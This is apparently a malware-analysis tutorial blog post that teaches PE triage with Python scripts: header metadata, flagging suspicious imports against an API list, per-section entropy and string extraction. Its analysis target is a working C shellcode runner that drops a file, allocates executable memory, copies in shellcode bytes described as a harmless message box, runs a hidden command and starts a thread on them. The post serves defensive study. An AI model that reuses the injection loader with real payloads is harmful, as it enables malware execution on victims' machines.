Malware analysis: part 10. Practical PE parsing. Simple python examples.

﷽

Hello, cybersecurity enthusiasts and white hackers!

This post is based on an exercise for my students and readers.

The PE file format theory - DOS header, Optional Header, section table, data directories - was already covered in the Windows shellcoding series. We are not repeating that here. Instead we go straight to the practical side: parsing a real PE binary with Python and extracting the information that matters for triage.

target binary

First we need something to analyze. Let’s write a simple Windows dropper in C (hack.c) that uses several APIs commonly seen in malware, such as VirtualAlloc, WriteProcessMemory, CreateThread, and WinExec:

/*
 * hack.c
 * simple windows dropper for PE analysis demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
 */
#include <windows.h>
#include <stdio.h>

// meow-meow messagebox harmless "malware" payload
unsigned char my_payload[] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
  0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
  0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
  0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
  0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
  0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
  0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
  0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
  0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
  0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
  0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
  0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
  0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
  0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
  0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
  0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
  0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
  0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};

static void drop_file(void) {
  HANDLE hFile = CreateFileA(
    "C:\\Temp\\quack.bin",
    GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL, NULL
  );
  if (hFile == INVALID_HANDLE_VALUE) return;
  DWORD written;
  WriteFile(hFile, my_payload, sizeof(my_payload), &written, NULL);
  CloseHandle(hFile);
}

int main(void) {
  drop_file();

  LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload),
                            MEM_COMMIT | MEM_RESERVE,
                            PAGE_EXECUTE_READWRITE);
  if (!mem) return 1;

  WriteProcessMemory(GetCurrentProcess(), mem,
                     my_payload, sizeof(my_payload), NULL);

  WinExec("cmd.exe /c echo meow", SW_HIDE);

  HANDLE hThread = CreateThread(NULL, 0,
                                (LPTHREAD_START_ROUTINE)mem,
                                NULL, 0, NULL);
  if (hThread) {
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
  }

  VirtualFree(mem, 0, MEM_RELEASE);
  return 0;
}

Cross-compile on Linux with mingw-w64:

x86_64-w64-mingw32-gcc -O0 -o hack.exe hack.c

We now have hack.exe - a 64-bit Windows PE. All four examples below analyze this same file.

.\hack.exe

Install the library if you have not already:

pip install pefile

practical example 1 - basic metadata

hack.py reads the File Header and Optional Header and prints the fields that matter most for first-look triage: architecture, compile timestamp, entry point, image base, section list.

#!/usr/bin/env python3
"""
hack.py - PE basic metadata
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import datetime
import pefile

MACHINES = {
  0x014c: "x86 (i386)",
  0x8664: "x64 (AMD64)",
  0x01c0: "ARM",
  0xaa64: "ARM64",
}

def parse_basic(path: str) -> None:
  pe = pefile.PE(path)

  machine  = pe.FILE_HEADER.Machine
  ts       = pe.FILE_HEADER.TimeDateStamp
  ep       = pe.OPTIONAL_HEADER.AddressOfEntryPoint
  base     = pe.OPTIONAL_HEADER.ImageBase
  n_sects  = pe.FILE_HEADER.NumberOfSections
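  # utcfromtimestamp() is deprecated since Python 3.12; use an aware UTC datetime instead
  compiled = datetime.datetime.fromtimestamp(ts, datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")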

  print(f"file       : {path}")
  print(f"machine    : {MACHINES.get(machine, f'unknown 0x{machine:04x}')}")
  print(f"compiled   : {compiled}")
  print(f"entry point: 0x{ep:08x}  (VA 0x{base + ep:08x})")
  print(f"image base : 0x{base:016x}")
  print(f"sections   : {n_sects}")
  print()

  print(f"  {'name':<10} {'virt addr':>12}  {'raw size':>10}  characteristics")
  print(f"  {'-'*10} {'-'*12}  {'-'*10}  {'-'*14}")
  for s in pe.sections:
    name = s.Name.decode(errors="replace").rstrip("\x00")
    print(f"  {name:<10} 0x{s.VirtualAddress:08x}    {s.SizeOfRawData:>10}  0x{s.Characteristics:08x}")

  pe.close()

if __name__ == "__main__":
  parse_basic(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

demo 1

Just run:

python3 hack.py hack.exe

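The compile timestamp is one of the first things to check in triage. Malware authors sometimes set it to zero (0x00000000) or forge an old date to confuse analysts, so a timestamp of exactly 0, or one far in the future, is itself an indicator. Treat it as a hint rather than proof: some toolchains that produce reproducible builds deliberately write a non-date value into this field.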
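
The timestamp checks described above can be turned into a small helper. This is only a minimal sketch: the function name timestamp_verdict, the 1995 cutoff and the one-day tolerance are assumptions picked for illustration, not values from any standard. It takes the raw TimeDateStamp value that hack.py already reads from pe.FILE_HEADER.

```python
import datetime

# Hypothetical thresholds, chosen only for illustration.
EARLIEST = datetime.datetime(1995, 1, 1, tzinfo=datetime.timezone.utc)
FUTURE_SLACK = datetime.timedelta(days=1)

def timestamp_verdict(ts, now=None):
  """Classify a raw PE TimeDateStamp (seconds since the Unix epoch)."""
  if now is None:
    now = datetime.datetime.now(datetime.timezone.utc)
  if ts == 0:
    return "zeroed"
  compiled = datetime.datetime.fromtimestamp(ts, datetime.timezone.utc)
  if compiled > now + FUTURE_SLACK:
    return "future"
  if compiled < EARLIEST:
    return "implausibly old"
  return "plausible"

if __name__ == "__main__":
  # Sample values only; in practice pass pe.FILE_HEADER.TimeDateStamp.
  for ts in (0, 100000, 1700000000, 0xFFFFFFF0):
    print(f"0x{ts:08x} -> {timestamp_verdict(ts)}")
```

The now parameter exists so the check can be tested against a fixed reference date instead of the wall clock.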

practical example 2 - import table and suspicious API detection

hack2.py walks the import directory and flags any function that appears in a known-suspicious list. The list covers the most common Windows APIs used for process injection, remote execution, keylogging, registry persistence, and anti-debug.

#!/usr/bin/env python3
"""
hack2.py - import table + suspicious API detection
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import pefile

SUSPICIOUS = {
  # memory / injection
  "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "VirtualProtectEx",
  "WriteProcessMemory", "ReadProcessMemory",
  "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
  # thread injection
  "CreateRemoteThread", "CreateRemoteThreadEx",
  "NtCreateThreadEx", "RtlCreateUserThread",
  "QueueUserAPC",
  # process
  "OpenProcess", "OpenThread",
  "CreateProcessA", "CreateProcessW",
  # execution
  "WinExec", "ShellExecuteA", "ShellExecuteW",
  "CreateThread",
  # networking
  "URLDownloadToFileA", "URLDownloadToFileW",
  "InternetOpenA", "InternetOpenW",
  "InternetConnectA", "InternetConnectW",
  "HttpOpenRequestA", "HttpSendRequestA",
  "socket", "connect", "send", "recv",
  # registry persistence
  "RegOpenKeyExA", "RegOpenKeyExW",
  "RegSetValueExA", "RegSetValueExW",
  # hooks / keylogging
  "SetWindowsHookExA", "SetWindowsHookExW",
  "GetAsyncKeyState", "GetKeyState",
  # anti-debug
  "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
  "NtQueryInformationProcess",
}

def parse_imports(path: str) -> None:
  pe = pefile.PE(path)

  if not hasattr(pe, "DIRECTORY_ENTRY_IMPORT"):
    print("no import directory found")
    pe.close()
    return

  flags = []

  for entry in pe.DIRECTORY_ENTRY_IMPORT:
    dll = entry.dll.decode(errors="replace")
    print(f"[+] {dll}")
    for imp in entry.imports:
      if imp.name is None:
        name = f"#ord{imp.ordinal}"
      else:
        name = imp.name.decode(errors="replace")
      tag = " <-- SUSPICIOUS" if name in SUSPICIOUS else ""
      print(f"    {name}{tag}")
      if tag:
        flags.append((dll, name))

  print()
  if flags:
    print(f"{len(flags)} suspicious import(s):")
    for dll, fn in flags:
      print(f"    {dll}!{fn}")
  else:
    print("no suspicious imports detected")

  pe.close()

if __name__ == "__main__":
  parse_imports(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

demo 2

Run:

python3 hack2.py hack.exe

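VirtualAlloc, WriteProcessMemory, CreateThread, WinExec - all flagged. This is exactly the import profile of a basic shellcode injector. Each of these APIs also appears in plenty of legitimate software on its own; it is the combination (allocate executable memory, write into it, start a thread on it) that should raise suspicion.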
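
A flat list treats every hit the same, so one possible refinement is to group the flagged names by what they enable and look at the combination. The sketch below is an assumption-laden illustration: the group names, the CAPABILITIES table and the looks_like_injector rule are hypothetical and not part of hack2.py; the API names themselves come from the SUSPICIOUS list above.

```python
# Hypothetical capability groups; the grouping is an illustration only.
CAPABILITIES = {
  "alloc":   {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"},
  "write":   {"WriteProcessMemory", "NtWriteVirtualMemory"},
  "thread":  {"CreateThread", "CreateRemoteThread", "CreateRemoteThreadEx",
              "NtCreateThreadEx", "RtlCreateUserThread", "QueueUserAPC"},
  "execute": {"WinExec", "ShellExecuteA", "ShellExecuteW",
              "CreateProcessA", "CreateProcessW"},
}

# allocate -> write -> start a thread: the steps a basic injector needs.
INJECTION_CHAIN = {"alloc", "write", "thread"}

def capabilities(imported_names):
  """Return the capability groups that the given import names touch."""
  names = set(imported_names)
  return {cap for cap, apis in CAPABILITIES.items() if names & apis}

def looks_like_injector(imported_names):
  """True when every step of the injection chain is present in the imports."""
  return INJECTION_CHAIN <= capabilities(imported_names)

if __name__ == "__main__":
  dropper = ["VirtualAlloc", "WriteProcessMemory", "CreateThread", "WinExec"]
  utility = ["CreateThread", "GetLastError", "CloseHandle"]
  for label, names in (("dropper", dropper), ("utility", utility)):
    print(label, sorted(capabilities(names)), looks_like_injector(names))
```

To use it with hack2.py, one could pass the function names collected in flags. A real triage rule would need tuning against known-clean binaries before its verdict is trusted.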

practical example 3 - per-section Shannon entropy

In part 6 we computed Shannon entropy for a whole file. Here we apply the same formula per section. A packed or encrypted section has entropy close to 8.0 bits per byte, which is the maximum for byte data because log2(256) = 8. A normal .text section is typically between 5.0 and 6.5.

#!/usr/bin/env python3
"""
hack3.py - per-section Shannon entropy
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import math
import pefile

def entropy(data: bytes) -> float:
  if not data:
    return 0.0
  freq = [0] * 256
  for b in data:
    freq[b] += 1
  n = len(data)
  h = 0.0
  for f in freq:
    if f:
      p = f / n
      h -= p * math.log2(p)
  return h

HIGH   = 7.0
MEDIUM = 6.0

def parse_entropy(path: str) -> None:
  pe = pefile.PE(path)

  print(f"section entropy: {path}\n")
  print(f"  {'name':<10} {'entropy':>8}  {'raw size':>10}  verdict")
  print(f"  {'-'*10} {'-'*8}  {'-'*10}  {'-'*22}")

  for s in pe.sections:
    name = s.Name.decode(errors="replace").rstrip("\x00")
    data = s.get_data()
    h    = entropy(data)

    if h >= HIGH:
      verdict = "!! packed / encrypted"
    elif h >= MEDIUM:
      verdict = "?  possibly compressed"
    else:
      verdict = "   normal"

    print(f"  {name:<10} {h:>8.4f}  {len(data):>10}  {verdict}")

  pe.close()

if __name__ == "__main__":
  parse_entropy(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

Run:

python3 hack3.py hack.exe

Our toy dropper is not packed, so entropy will be in the normal range. When you later run this against a UPX-packed binary, expect the UPX1 section, which holds the compressed data, to land well above the HIGH threshold, while UPX0 is usually empty on disk (raw size 0) and therefore reports 0.0. That is the detector working correctly.
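
Before trusting the verdicts, it can help to sanity-check the entropy function on inputs whose answers are known in advance. The sketch below is self-contained and rewrites the function with collections.Counter instead of the 256-slot list used in hack3.py; the formula is the same, and the sample buffers are synthetic rather than taken from hack.exe.

```python
import math
import os
from collections import Counter

def entropy(data: bytes) -> float:
  """Shannon entropy in bits per byte: sum of p * log2(1 / p)."""
  if not data:
    return 0.0
  n = len(data)
  return sum((c / n) * math.log2(n / c) for c in Counter(data).values())

if __name__ == "__main__":
  samples = {
    "one repeated byte":   b"A" * 4096,            # no uncertainty at all
    "two bytes, 50/50":    b"AB" * 2048,           # exactly one bit per byte
    "all 256 byte values": bytes(range(256)) * 16, # uniform, the maximum
    "os.urandom output":   os.urandom(4096),       # stands in for encrypted data
  }
  for label, data in samples.items():
    print(f"{label:<22} {entropy(data):.4f}")
```

The first three cases give 0.0, 1.0 and 8.0. The random buffer lands slightly below 8.0, because a finite sample is never perfectly uniform; this is also why the HIGH threshold sits at 7.0 rather than at the theoretical maximum.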

practical example 4 - string extraction from raw section data

strings is a standard tool, but running it as a subprocess is a black box. hack4.py does the same thing in pure Python: scan each section’s raw bytes with a regular expression for runs of printable ASCII of at least 6 characters. Students see exactly what strings does and can extend it (Unicode support, minimum length flag, output filtering).

#!/usr/bin/env python3
"""
hack4.py - printable string extraction from PE sections
author: @cocomelonc
https://cocomelonc.github.io/malware/2026/06/29/malware-analysis-10.html
"""
import sys
import re
import pefile

MIN_LEN = 6
PATTERN = re.compile(rb'[ -~]{' + str(MIN_LEN).encode() + rb',}')

def parse_strings(path: str) -> None:
  pe = pefile.PE(path)

  total = 0
  for s in pe.sections:
    name    = s.Name.decode(errors="replace").rstrip("\x00")
    data    = s.get_data()
    matches = PATTERN.findall(data)

    if matches:
      print(f"{name} - {len(matches)} string(s):")
      for m in matches:
        print(f"    {m.decode(errors='replace')}")
      total += len(matches)
    else:
      print(f"{name} - no strings >= {MIN_LEN} chars")

  print(f"\ntotal: {total} string(s)")
  pe.close()

if __name__ == "__main__":
  parse_strings(sys.argv[1] if len(sys.argv) > 1 else "hack.exe")

Run:

python3 hack4.py hack.exe

We should see the hardcoded strings from our dropper: C:\Temp\quack.bin, cmd.exe /c echo meow, the Meow-meow! text from the payload, and the imported DLL and function names that the linker embedded. The file path and the command line are our IOCs.
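
The Unicode extension mentioned earlier could look roughly like this. Windows programs that call the wide (W) APIs store their strings as UTF-16LE, where every printable ASCII character is followed by a zero byte, so the ASCII pattern misses them. This is a minimal sketch: WIDE_PATTERN and wide_strings are hypothetical names, and the test buffer is synthetic. Our dropper calls the ANSI (A) APIs, so expect few or no hits on hack.exe itself.

```python
import re

MIN_LEN = 6

# Printable ASCII characters encoded as UTF-16LE: each one is followed by 0x00.
WIDE_PATTERN = re.compile(rb'(?:[ -~]\x00){' + str(MIN_LEN).encode() + rb',}')

def wide_strings(data: bytes) -> list:
  """Return UTF-16LE strings of at least MIN_LEN printable ASCII characters."""
  return [m.decode("utf-16-le") for m in WIDE_PATTERN.findall(data)]

if __name__ == "__main__":
  # Synthetic buffer standing in for the bytes returned by s.get_data().
  blob = (b"\x01\x02" + "C:\\Temp\\quack.bin".encode("utf-16-le")
          + b"\xff\xfe\x90" + "short".encode("utf-16-le") + b"\x00\x00")
  for s in wide_strings(blob):
    print(s)
```

In hack4.py the function would be called on the same data buffer, next to PATTERN.findall(data). Only the ASCII subset of UTF-16 is covered here; strings in other scripts need a wider character class.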

summary

Four Python scripts, one compiled PE target, zero black-box tools:

script	what it does
`hack.py`	machine type, timestamp, entry point, sections
`hack2.py`	full import table, suspicious API flagging
`hack3.py`	per-section Shannon entropy (packing detector)
`hack4.py`	printable string extraction from raw bytes

Together they form a repeatable triage pipeline you can run against any unknown Windows binary before opening a disassembler. The natural next step is to pipe the extracted strings and suspicious imports into the VirusTotal API from part 4 to enrich the findings automatically.

In the next part we will cover dynamic analysis basics: tracing system calls on Linux with strace and ltrace to understand what a binary does at runtime without touching a disassembler at all.

I hope this post with practical examples is useful for malware researchers, reverse engineers and everyone interested in blue team skills.

Windows shellcoding part 3: PE file format
Malware analysis part 6: Shannon entropy
Malware analysis part 4: VirusTotal API
pefile
mingw-w64
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine.

cocomelonc
